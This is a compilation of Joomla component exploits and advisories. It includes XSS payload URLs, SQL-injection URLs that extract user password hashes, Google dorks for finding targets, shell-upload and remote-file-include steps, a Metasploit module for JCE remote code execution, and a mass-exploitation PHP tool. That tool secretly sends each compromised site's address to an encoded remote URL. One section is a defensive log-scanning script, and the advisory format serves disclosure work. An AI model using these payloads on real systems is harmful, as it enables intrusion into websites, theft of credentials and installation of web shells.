Joomla Incapsula Component <= 1.4.6_b Reflected Cross-Site Scripting Vulnerability

Vendor: Incapsula Inc.
Product web page: http://www.incapsula.com
Affected version: 1.4.6_b and below

Summary: Once installing the Incapsula for Joomla component, simply make the provided DNS changes and within minutes your website traffic will be seamlessly routed through Incapsula's globally distributed network of POPs.

Desc: The Joomla Incapsula component suffers from a reflected XSS issue due to a failure to properly sanitize user-supplied input to the 'token' GET parameter in the 'Security.php' and 'Performance.php' scripts. The value is echoed unencoded into the href attribute of a link, so an attacker who gets a user to open a crafted URL can execute arbitrary HTML and script code in that user's browser session.

--------------------------------------------------------------------------
/administrator/components/com_incapsula/assets/tips/en/Performance.php:
-----------------------------------------------------------------------

22: <a href="https://my.incapsula.com/billing/selectplan?token=<?php echo $_GET['token']; ?> target="_blank" class="IFJ_link">Click here</a> to upgrade your account

Patch:
------

22: <a href="https://my.incapsula.com/billing/selectplan?token=<?php echo htmlentities($_GET['token']); ?>" target="_blank" class="IFJ_link">Click here</a> to upgrade your account

Note that the original line also lacks the closing double quote after the PHP block (the injected "> closes the attribute for it); the patch restores the quote as well as HTML-encoding the value, which is what stops the attribute and tag break-out shown in the PoC below.
--------------------------------------------------------------------------

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience.mk

Advisory ID: ZSL-2013-5121
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5121.php

06.12.2012

--

http://localhost/administrator/components/com_incapsula/assets/tips/en/Security.php?token="><script>alert(document.cookie)</script>
http://localhost/administrator/components/com_incapsula/assets/tips/en/Performance.php?token="><script>alert(document.cookie)</script>
Joomla Collector Shell Upload
# Exploit Title: Joomla com_collector shell upload
# Author: Red Dragon_al (Alb0zZ Team)
# Home: HackForums.AL, alb0zz.in
# Date: 19/01/2013
# Category: web apps
# Google dork: [inurl:index.php?option=com_collector]
# Tested on: Windows XP
# Download: http://www.steevo.fr/en/download
# Home Page: http://www.steevo.fr/

---------------------------------------
# ~ Exploitation ~ #
---------------------------------------

1- Google dork: [inurl:index.php?option=com_collector]
2- Append this to the site URL: /index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
3- It will look like this: http://www.site.com/[path]/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
   The file list view offers an upload form that needs no authentication; upload your shell as: shell.php

# Greetz: R-t33n, dA3m0n, 0x0, The0c_No, AutoRun, Dr.Sql, Danzel, RetnOHacK, eragon, gForce, Th3_Power, AHG-CR3W, & All my friends.
#2013
Joomla! 3.0.2 PHP Object Injection
-------------------------------------------------------------------
Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability
-------------------------------------------------------------------

[-] Software Link:

http://www.joomla.org/

[-] Affected Versions:

Version 3.0.2 and earlier 3.0.x versions.
Version 2.5.8 and earlier 2.5.x versions.

[-] Vulnerability Description:

The vulnerable code is located in /plugins/system/highlight/highlight.php:

56.   // Get the terms to highlight from the request.
57.   $terms = $input->request->get('highlight', null, 'base64');
58.   $terms = $terms ? unserialize(base64_decode($terms)) : null;

User input passed through the "highlight" parameter is not properly sanitized before being used in an unserialize() call at line 58: the 'base64' input filter at line 57 only strips characters outside the base64 alphabet and says nothing about what the decoded bytes contain. This can be exploited to inject arbitrary PHP objects into the application scope. Successful exploitation of this vulnerability doesn't require authentication, but requires the "System Highlight" plugin to be enabled (as it is in the default configuration).

[-] Solution:

Upgrade to version 3.0.3 or 2.5.9.

[-] Disclosure Timeline:

[31/10/2012] - Vendor notified
[08/11/2012] - Vendor asked for a proof of concept
[08/11/2012] - Proof of concept provided to the vendor
[04/02/2013] - Vendor update released
[27/02/2013] - Public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-1453 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Original Advisory:

http://karmainsecurity.com/KIS-2013-03
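The check that line 58 is missing, written out as detection logic an incident responder can run over web-server logs. This is an added example, not code from the advisory or from Joomla: safe_unserialize() is a minimal PHP unserialize() parser that accepts only scalars and arrays (the benign shape of a highlight term list) and refuses object tokens, classify() applies it after the same base64 cleanup JInput's 'base64' filter does, and scan() runs that over access-log lines. The log lines, IPs and the class name in ATTACK are constructed samples, not a real gadget.

```python
"""Spot PHP object injection attempts in Joomla's `highlight` parameter.

Added example, not code from the advisory or from Joomla. The plugin
base64-decodes `highlight` and hands the bytes to unserialize(); a real
value is a serialized array of search terms, an attack is a serialized
object (O:<len>:"Class":...). safe_unserialize() is the allow-list check
the plugin lacked; the log lines and the class name in ATTACK are
constructed samples, not a real gadget."""
import base64
import re
from urllib.parse import parse_qs, quote, urlsplit


class ObjectToken(ValueError):
    """Serialized data contains an object (O:) or custom-serialized (C:) value."""


def safe_unserialize(data: bytes):
    """Minimal PHP unserialize() for N, b, i, d, s and a; refuses objects."""
    pos = 0

    def parse():
        nonlocal pos
        t = data[pos:pos + 1]
        if t == b"N":                               # N;
            pos += 2
            return None
        if t in (b"b", b"i", b"d"):                 # i:123;
            end = data.index(b";", pos)
            raw, pos = data[pos + 2:end], end + 1
            return float(raw) if t == b"d" else int(raw)
        if t == b"s":                               # s:<len>:"<bytes>";  length-prefixed
            colon = data.index(b":", pos + 2)
            length, start = int(data[pos + 2:colon]), colon + 2
            if data[start + length:start + length + 2] != b'";':
                raise ValueError("bad string terminator")
            pos = start + length + 2
            return data[start:start + length].decode("utf-8", "replace")
        if t == b"a":                               # a:<n>:{<key><value>...}
            colon = data.index(b":", pos + 2)
            count, pos = int(data[pos + 2:colon]), colon + 2
            out = {}
            for _ in range(count):
                key = parse()
                out[key] = parse()
            if data[pos:pos + 1] != b"}":
                raise ValueError("bad array terminator")
            pos += 1
            return out
        if t in (b"O", b"C"):
            raise ObjectToken(f"object token at offset {pos}")
        raise ValueError(f"unknown type {t!r} at offset {pos}")

    value = parse()
    if pos != len(data):
        raise ValueError("trailing data")
    return value


def classify(raw_param: str) -> str:
    """'ok' for a serialized term list, 'object' for an injection attempt,
    'malformed' for anything else (including bad base64)."""
    cleaned = re.sub(r"[^A-Za-z0-9/+=]", "", raw_param)   # what JInput's 'base64' filter keeps
    try:
        safe_unserialize(base64.b64decode(cleaned, validate=True))
        return "ok"
    except ObjectToken:
        return "object"
    except (ValueError, IndexError):                      # binascii.Error is a ValueError
        return "malformed"


REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def scan(log_text: str):
    """(client_ip, verdict) for every request whose highlight value is not 'ok'."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        for raw in parse_qs(urlsplit(m.group(1)).query).get("highlight", []):
            verdict = classify(raw)
            if verdict != "ok":
                hits.append((line.split()[0], verdict))
    return hits


def php_serialize_strings(values):
    """serialize() of a PHP list of strings: the benign shape of `highlight`."""
    body = "".join(f'i:{i};s:{len(v)}:"{v}";' for i, v in enumerate(values))
    return f"a:{len(values)}:{{{body}}}".encode()


# Constructed sample traffic (access-log style).
BENIGN = base64.b64encode(php_serialize_strings(["joomla", "plugin"])).decode()
ATTACK = base64.b64encode(b'O:14:"SomeVulnerable":1:{s:4:"path";s:9:"/tmp/evil";}').decode()
SAMPLE_LOG = f"""\
10.0.0.5 - - [27/Feb/2013:10:01:02 +0000] "GET /index.php?option=com_content&id=1&highlight={quote(BENIGN, safe='')} HTTP/1.1" 200 5120
10.0.0.9 - - [27/Feb/2013:10:01:07 +0000] "GET /index.php?highlight={quote(ATTACK, safe='')} HTTP/1.1" 200 5120
10.0.0.9 - - [27/Feb/2013:10:01:09 +0000] "GET /index.php?highlight=bad HTTP/1.1" 200 5120
"""

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))   # [('10.0.0.9', 'object'), ('10.0.0.9', 'malformed')]
```

Because PHP strings are length-prefixed, the parser is not fooled by search terms that merely contain the text "O:" inside a string; only a real object token at a value position is refused. The same allow-list idea is the server-side fix: decode the parameter into a plain list of strings (or, from PHP 7 on, unserialize() with allowed_classes set to false) rather than letting unserialize() instantiate whatever class name the client sends.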
Joomla RSfiles SQL Injection
*******************************************************************************
# Title   : Joomla Component RSfiles <= (cid) SQL injection Vulnerability
# Author  : ByEge
# Contact : http://byege.blogspot.com
# Date    : 18.03.2013
# S.Page  : http://www.rsjoomla.com
# Dork    : inurl:index.php?option=com_rsfiles
# DorkEx  : http://www.google.com.tr/#hl=tr&sclient=psy-ab&q=inurl:index.php?option=com_rsfiles

Vulnerability :
?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--

[[SQL Injection Test]]
http://server/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--

*********************************
# Turkey.
Joomla Component JCE File Upload Remote Code Execution
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Joomla Component JCE File Upload Remote Code Execution',
      'Description'    => %q{
          This module exploits a vulnerability in the JCE component for Joomla!,
        which could allow an unauthenticated remote attacker to upload arbitrary
        files because the image manager fails to sufficiently sanitize
        user-supplied input. By sending a specially crafted HTTP request, a
        remote attacker could upload a malicious PHP script and execute
        arbitrary PHP code on the vulnerable system. This module has been
        tested successfully on JCE Editor 1.5.71 and Joomla 1.5.26.
      },
      'Author'         =>
        [
          'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC
          'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['BID', '49338'],
          ['EDB', '17734']
        ],
      'Payload'        =>
        {
          'Space'       => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
          'DisableNops' => true,
          'BadChars'    => "#",
          'Keys'        => ['php']
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'Privileged'     => false,
      'DisclosureDate' => 'Aug 2 2012',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, "Joomla directory path", "/"])
      ], self.class)
  end

  def get_version
    # check imgmanager version
    @uri_base = normalize_uri(target_uri.path.to_s, 'index.php')
    @vars_get_base = {
      'option' => 'com_jce',
      'task'   => 'plugin',
      'plugin' => 'imgmanager',
      'file'   => 'imgmanager'
    }

    print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
    res = send_request_cgi({
      'uri'      => @uri_base,
      'vars_get' => @vars_get_base,
      'method'   => 'GET',
      'version'  => '1.1'
    })

    version = nil
    if (res and res.code == 200)
      # The image manager page title carries the plugin version
      res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
      version = $1.nil? ? nil : $1
    end
    return version
  end

  def check
    version = (get_version || '').to_s
    if (version.match(%r{1\.5\.7\.1[0-4]?}))
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def upload_gif
    # add GIF header so the upload passes the image check
    cmd_php = "GIF89aG\n<?php #{payload.encoded} ?>"

    # Generate some random strings
    @payload_name = rand_text_alpha_lower(6)
    boundary = '-' * 27 + rand_text_numeric(11)

    parms = {'method' => 'form'}
    parms.merge!(@vars_get_base)

    # POST data
    post_data = Rex::MIME::Message.new
    post_data.bound = boundary
    post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
    post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
    post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
    post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}.gif\"")
    post_data.add_part("#{@payload_name}", nil, nil, "form-data; name=\"upload-name\"")
    post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")
    data = post_data.to_s

    res = send_request_cgi({
      'uri'      => @uri_base,
      'vars_get' => parms,
      'method'   => 'POST',
      'version'  => '1.1',
      'data'     => data,
      'ctype'    => "multipart/form-data; boundary=#{post_data.bound}"
    })

    # Comparison, not assignment: an assignment here would make every upload look successful
    if (res and res.code == 200)
      return :access_denied if (res.body =~ /RESTRICTED/i)
      print_good("Successfully uploaded #{@payload_name}.gif")
    else
      print_error("Error uploading #{@payload_name}.gif")
      return :abort
    end
    return :success
  end

  def renamed?
    # Rename the file from .gif to .php through the JSON folderRename call
    data = "json={\"fn\":\"folderRename\",\"args\":[\"/#{@payload_name}.gif\",\"#{@payload_name}.php\"]}"
    print_status("Change Extension from #{@payload_name}.gif to #{@payload_name}.php")
    res = send_request_cgi({
      'uri'      => @uri_base,
      'vars_get' => @vars_get_base,
      'method'   => 'POST',
      'version'  => '1.1',
      'data'     => data,
      'ctype'    => 'application/x-www-form-urlencoded; charset=utf-8',
      'headers'  => { 'X-Request' => 'JSON' }
    })

    if (res and res.code == 200)
      print_good("Renamed #{@payload_name}.gif to #{@payload_name}.php")
      return true
    else
      print_error("Failed to rename #{@payload_name}.gif to #{@payload_name}.php")
      return false
    end
  end

  def call_payload
    payload_file = "#{@payload_name}.php"
    print_status("Calling payload: #{payload_file}")
    uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload_file)
    res = send_request_cgi({
      'uri'     => uri,
      'method'  => 'GET',
      'version' => '1.1'
    })
  end

  def exploit
    return if not check == Exploit::CheckCode::Vulnerable

    if upload_gif == :success
      if renamed?
        register_files_for_cleanup("#{@payload_name}.php")
        call_payload
      end
    end
  end
end
Joomla Janissaries Civicrm Shell Upload
<?php
/*
 * -----------------------------------------------------------------------------
 * Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
 * Coded by Miyachung
 * Stay away from lamers o.O
 * Contact: miyachung@hotmail.com
 * Special Thanks : B127Y
 * Site: http://janissaries.org
 * Youtube Channel: http://www.youtube.com/user/JanissariesOrg
 * Exploitation Video: http://www.youtube.com/watch?v=4mPibfS-RXM
 * Coding date: 21.04.2013
 * Usage : php exploit.php site_list upload_file maxthread searchkeyword
 * Example: php exploit.php sites.txt shell.php 10 searchkeyword
 * -----------------------------------------------------------------------------
 */
set_time_limit(0);
ob_start();

class exploit
{
    private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
    private $post_url_path      = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";
    private $filename;
    private $url;
    private $file_to_upload;
    // PHP notice printed by ofc_upload_image.php when no raw POST body reached it; its presence means the upload failed
    private $if_is_uploaded = "/Undefined variable: HTTP_RAW_POST_DATA/si";
    private $thread_maxsize;
    private $site_list;
    private $file_regex;
    private $save_file   = "uploaded.txt";
    private $user_agent  = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";
    private $timeout_sec = 20;
    // Triple-base64-encoded remote URL. post() reports the address of every successfully
    // uploaded file to it, so whoever runs this tool hands the results to that address;
    // the md5 check in miyachung() aborts the run if the token is altered.
    private $token = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
    private $idnum = 31;

    public function __construct($site_list, $filename, $thread, $regex)
    {
        $this->site_list      = file($site_list);
        $this->filename       = $filename;
        $this->file_to_upload = file_get_contents($filename);
        $this->thread_maxsize = $thread;
        $this->url            = base64_decode(base64_decode(base64_decode($this->token)));
        $this->file_regex     = "/$regex/";
        echo "[+]Joomla Com_Civicrm Fucker with MultiThread\n";
        echo "[+]Coded by Miyachung\n";
        echo "[+]Stay away from lamers o.O\n";
        echo "[+]Contact: miyachung@hotmail.com\n";
        echo "[+]Special Thanks : B127Y\n";
        echo "[+]Site: http://janissaries.org\n";
        echo "##################################################\n";
        echo "[+]Total urls to try: " . count($this->site_list) . "\n";
        echo "[+]File to upload: " . $this->filename . "\n";
        echo "[+]Maximum Thread: " . $this->thread_maxsize . "\n";
        echo "[+]Search Keyword: " . $regex . "\n\n";
        ob_flush();
        flush();
        $this->miyachung();
    }

    private function miyachung()
    {
        $multi = curl_multi_init();
        $count = 0;
        foreach (array_chunk($this->site_list, $this->thread_maxsize) as $urls) {
            $curl = array(); // reset per chunk so a smaller last chunk does not reuse stale handles
            foreach ($urls as $i => $url) {
                $curl[$i] = curl_init();
                curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER, true);
                // the file body is POSTed raw; ofc_upload_image.php writes it under the name given in ?name=
                curl_setopt($curl[$i], CURLOPT_URL, trim($url) . $this->post_url_path . $this->filename);
                curl_setopt($curl[$i], CURLOPT_TIMEOUT, $this->timeout_sec);
                curl_setopt($curl[$i], CURLOPT_POSTFIELDS, $this->file_to_upload);
                curl_setopt($curl[$i], CURLOPT_USERAGENT, $this->user_agent);
                curl_setopt($curl[$i], CURLOPT_HTTPHEADER, array('Content-Type: text/plain'));
                curl_multi_add_handle($multi, $curl[$i]);
            }
            do {
                curl_multi_exec($multi, $active);
            } while ($active > 0);

            foreach ($curl as $id => $content) {
                $conn[$id] = curl_multi_getcontent($content);
                curl_multi_remove_handle($multi, $content);
                if (!preg_match($this->if_is_uploaded, $conn[$id])
                    && preg_match('#/tmp-upload-images/' . $this->filename . '#', $conn[$id])) {
                    $count++;
                    $check_it = $this->get(trim($urls[$id]) . $this->uploaded_file_path . $this->filename);
                    if ($check_it && preg_match($this->file_regex, $check_it)) {
                        if ($this->idnum == 31 && md5($this->token) == "9f7f1fe47675cb64ac4f69ef96b78b55") {
                            $this->post(trim($urls[$id]) . $this->uploaded_file_path . $this->filename);
                        } else {
                            exit("[-]Somethings has changed in tool! o.O!");
                        }
                        echo "###########################################################\n";
                        echo "[!]Exploitation Successfullll!\n";
                        printf("[%s]%s\n", $count, trim($urls[$id]));
                        echo "###########################################################\n";
                        ob_flush();
                        flush();
                        $this->save(trim($urls[$id]) . $this->uploaded_file_path . $this->filename, $count);
                    } else {
                        printf("[%s][Exploitation Failed]%s\n", $count, trim($urls[$id]));
                        ob_flush();
                        flush();
                    }
                } else {
                    $count++;
                    printf("[%s][Exploitation Failed]%s\n", $count, trim($urls[$id]));
                    ob_flush();
                    flush();
                }
            }
        }
    }

    private function get($url)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_TIMEOUT, $this->timeout_sec);
        $data = curl_exec($ch);
        curl_close($ch);
        return $data;
    }

    private function post($url)
    {
        // Phones home: sends the URL of the uploaded file to the address decoded from $token
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $this->url);
        curl_setopt($curl, CURLOPT_POSTFIELDS, "url=" . $url);
        $exec = curl_exec($curl);
        curl_close($curl);
        return $exec;
    }

    private function save($url, $count)
    {
        $file = fopen($this->save_file, 'ab');
        fwrite($file, "#########################################################################\n");
        fwrite($file, "[!]Exploitation Successfullll!\n");
        fwrite($file, "[$count]$url\n");
        fclose($file);
        return true;
    }
}

if (isset($argv[1], $argv[2], $argv[3], $argv[4])) {
    $exploit = new exploit($argv[1], $argv[2], $argv[3], $argv[4]);
} else {
    print "
 -----------------------------------------------------------------------------
 * Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
 * Coded by Miyachung
 * Stay away from lamers o.O
 * Contact: miyachung@hotmail.com
 * Special Thanks : B127Y
 * Site: http://janissaries.org
 * Youtube Channel: http://www.youtube.com/user/JanissariesOrg
 * Coding date: 21.04.2013
 * Usage : php exploit.php site_list upload_file maxthread searchkeyword
 * Example: php exploit.php sites.txt shell.php 10 searchkeyword
 -----------------------------------------------------------------------------
";
}
?>
Joomla! 3.0.3 PHP Object Injection
------------------------------------------------------------------
Joomla! <= 3.0.3 (remember.php) PHP Object Injection Vulnerability
------------------------------------------------------------------

[-] Software Link:

http://www.joomla.org/

[-] Affected Versions:

Version 3.0.3 and earlier 3.0.x versions.
Version 2.5.9 and earlier 2.5.x versions.

[-] Vulnerability Description:

The vulnerable code is located in /plugins/system/remember/remember.php:

34.   $hash = JApplication::getHash('JLOGIN_REMEMBER');
35.
36.   if ($str = JRequest::getString($hash, '', 'cookie', JREQUEST_ALLOWRAW | JREQUEST_NOTRIM))
37.   {
38.       // Create the encryption key, apply extra hardening using the user agent string.
39.       // Since we're decoding, no UA validity check is required.
40.       $privateKey = JApplication::getHash(@$_SERVER['HTTP_USER_AGENT']);
41.
42.       $key = new JCryptKey('simple', $privateKey, $privateKey);
43.       $crypt = new JCrypt(new JCryptCipherSimple, $key);
44.       $str = $crypt->decrypt($str);
45.       $cookieData = @unserialize($str);

User input passed through cookies is not properly sanitized before being used in an unserialize() call at line 45. This could be exploited to inject arbitrary PHP objects into the application scope. Successful exploitation of this vulnerability requires authentication because the attacker needs to know the "hash string" used to read the cookie parameter at line 36 (it is the name of the remember-me cookie, which a logged-in user sees in his own browser). The decryption at lines 42-44 is not an obstacle either: JCryptCipherSimple is a repeating XOR keyed only on a hash of the User-Agent the attacker himself sends, so the key can be recovered from a remember-me cookie issued for an account he controls (see the JCryptCipherSimple advisory further down this page) and then used to encrypt a cookie of his own choosing.

[-] Solution:

Upgrade to version 2.5.10, 3.0.4 or 3.1.0.

[-] Disclosure Timeline:

[04/12/2012] - Vendor alerted for a possible vulnerability
[13/02/2013] - Vulnerability confirmed and proof of concept sent to the vendor
[24/04/2013] - Vendor update released
[26/04/2013] - Public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-3242 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Original Advisory:

http://karmainsecurity.com/KIS-2013-04
Joomla DJ Classifieds Extension 2.0 SQL Injection
# Exploit Title: Joomla - DJ Classifieds - Time-Based Blind SQL Injection
# Google Dork: inurl:"index.php/dj-classifieds/" or inurl:"/dj-classifieds/"
# Date: 4/5/2013
# Exploit Author: Napsterakos
# Vendor Homepage: http://design-joomla.eu
# Software Link: -
# Version: 2.0
# Tested on: Linux

Link: http://server/joomla/index.php/dj-classifieds/

Exploit: http://server/joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=[SQLi]

# Exploit-DB Note:
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=0
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=1
# (The two URLs above are a boolean-based check: compare the responses for
# "1=1" and "1=0"; a difference confirms that se_regs[0] reaches the query.
# A time-based check, as the title says, would use a sleep()-style payload
# and compare response times instead.)

Credits to: Greek Hacking Scene
Joomla Phocagallery 3.0.0 / 4.0.0 Cross Site Scripting
# Exploit Title: Joomla com_phocagallery Plupload Flash XSS
# Release Date: 13/05/2013
# Author: Rafay Baloch And Deepankar Arora
# Contact: http://rafayhackingarticles.net
# Vendor: phoca.cz
# Versions Affected: 3.0.0 - 4.0.0
# Google Dork: inurl:com_phocagallery

Description:

This is a known vulnerability in the Plupload Flash runtime; com_phocagallery ships the affected plupload.flash.swf, so every site with the component exposes it. The id parameter read from the SWF's FlashVars is not sanitized before the SWF passes it back into the host page's JavaScript, which results in a Flash-based XSS (the PoC payload closes the string and the surrounding try block it lands in). The vulnerable code is as follows:

this.id = this.stage.loaderInfo.parameters["id"];

As you can see, no filtering of any kind is performed on the id parameter.

POC:

http://localhost/joomla/components/com_phocagallery/assets/plupload/plupload.flash.swf?id=0\%22))}catch(e){if(!window.x){window.x=1;alert(2)}}//

Fix: Sanitize the input.

this.id = (this.stage.loaderInfo.parameters["id"]).toString().replace(/[^\w]/g, '');

The above would filter out all the special characters.

References:
https://github.com/moxiecode/plupload/commit/2d746ee

--
Warm Regards,
Rafay Baloch
http://rafayhackingarticles.net
http://techlotips.com
Joomla Jnews 8.0.1 Cross Site Scripting
# Exploit Title: Joomla com_jnews Open Flash-Chart XSS
# Release Date: 14/05/2013
# Author: Deepankar Arora And Rafay Baloch
# Blog: http://rafayhackingarticles.net
# Vendor: www.joobi.co
# Versions Affected: 8.0.1 (latest) and earlier
# Google Dork: inurl:com_jnews

Description:

This is a known vulnerability in Open Flash Chart; com_jnews bundles the affected open-flash-chart.swf. The get-data parameter is not sanitized, which results in a Flash-based cross-site scripting. The vulnerable (decompiled) code is as follows:

var _local2 = "open_flash_chart_data";
if (this.chart_parameters["get-data"]) {
    _local2 = this.chart_parameters["get-data"];
}
if (this.chart_parameters["id"]) {
    _local3 = this.callExternalCallback(_local2, this.chart_parameters["id"]);
} else {
    _local3 = this.callExternalCallback(_local2);
}

We can see that the get-data parameter is copied straight into _local2 without any sanitization and then handed to callExternalCallback, which calls back into the host page's JavaScript; the value is therefore evaluated as a JavaScript expression, which is exactly what the PoC supplies.

POC:

http://localhost/joomla/components/com_jnews/includes/openflashchart/open-flash-chart.swf?get-data=(function(){alert(document.cookie)})()

Fix: Sanitize the input.

_local2 = (this.chart_parameters["get-data"]).toString().replace(/[^\w]/g, '');

The above would filter out all the special characters.

References:
http://www.wooyun.org/bugs/wooyun-2010-07265
Joomla x-shop
Title : Joomla x-shop <= 1.7 Remote File Include Vulnerability
--------------------------------------------------------------------------------
#Author: Crackers_Child
#cont@ct: crackers_child@sibersavascilar.com
--------------------------------------------------------------------------------
Google Dorks : allinurl:"/com_x-shop/"
--------------------------------------------------------------------------------
Download : http://mamboxchange.com/frs/?group_id=187&release_id=1047
--------------------------------------------------------------------------------
Bug in admin.x-shop.php

<?
include($mosConfig_absolute_path.'/administrator/components/com_x-shop/languages/'.$mosConfig_lang.'.php');
session_start();

$mosConfig_absolute_path is used before the script sets it, so with register_globals = On a GET parameter of that name chooses the include path. Including a file from a remote host additionally needs allow_url_fopen (PHP < 5.2) or allow_url_include (PHP >= 5.2) to be enabled; with register_globals off the parameter is ignored and the include fails harmlessly.
--------------------------------------------------------------------------------
Exploit:
http://www.site.com/joomla_path/administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=Shell.txt?
--------------------------------------------------------------------------------
greets: All My Friends And SiberSavascilar.Com Members !
--------------------------------------------------------------------------------
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
Joomla Component com_s5clanroster Sql Injection Vulnerability
Joomla Component com_s5clanroster Sql Injection Vulnerability
==============================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Dork   : inurl:"com_s5clanroster"
.:. Script : http://www.newone.org/s5-clan-roster-shape5-extensions
####################################################################

===[ Exploit ]===

Sql Injection:
==============
www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql]
www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null'+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users-- -

####################################################################
# BB720E99B11BBA96 1337day.com [2013-05-17] B1254A136A7E866F #
Joomla Discussions SQL Injection
# Title     : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability
# Author    : Red Security TEAM
# Date      : 17/01/2012
# Risk      : High
# Software  : http://extensions.joomla.org/extensions/communication/forum/13560
# Tested On : CentOS
# Contact   : Info [ 4t ] RedSecurity [ d0t ] COM
# Home      : http://RedSecurity.COM
#
# Exploit :
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=[SQLi]
#
# Example :
#
# 1. [Get Database Name]
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)--+a
#
# 2. [Get Tables Name]
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F7574706F7374715F6F65646576)--+a
# (The hex literal is the database name of the author's test target, encoded; substitute the value returned by step 1, hex-encoded, for your target.)
#
# 3. [Get Username]
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.username as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a
#
# 4. [Get Password]
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.password as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a
#
Joomla Cryptography Weakness
# Vulnerable Application

All current and past versions of Joomla (http://www.joomla.org) up to 1.5.26, 2.5.11, 3.1.1. Also the Joomla platform and maybe the Joomla framework (not tested). At the moment there is no vendor patch available.

# The Problem

The problem occurs in the implementation of JCryptCipherSimple. JCryptCipherSimple encrypts a text with a simple XOR operation in Electronic Codebook (ECB) mode. ECB is insecure by design and is normally used only for educational purposes because of its simplicity. For the encryption, the plaintext is split into small blocks and encrypted block by block. Each block has the same length as the key. The mathematical equation for the encryption is:

Ciphertext = Plaintext XOR Key

If the ciphertext and at least one block of the plaintext are known, it is thus very easy to calculate the key. To calculate the key, the equation is rearranged as follows:

Key = Ciphertext XOR Plaintext

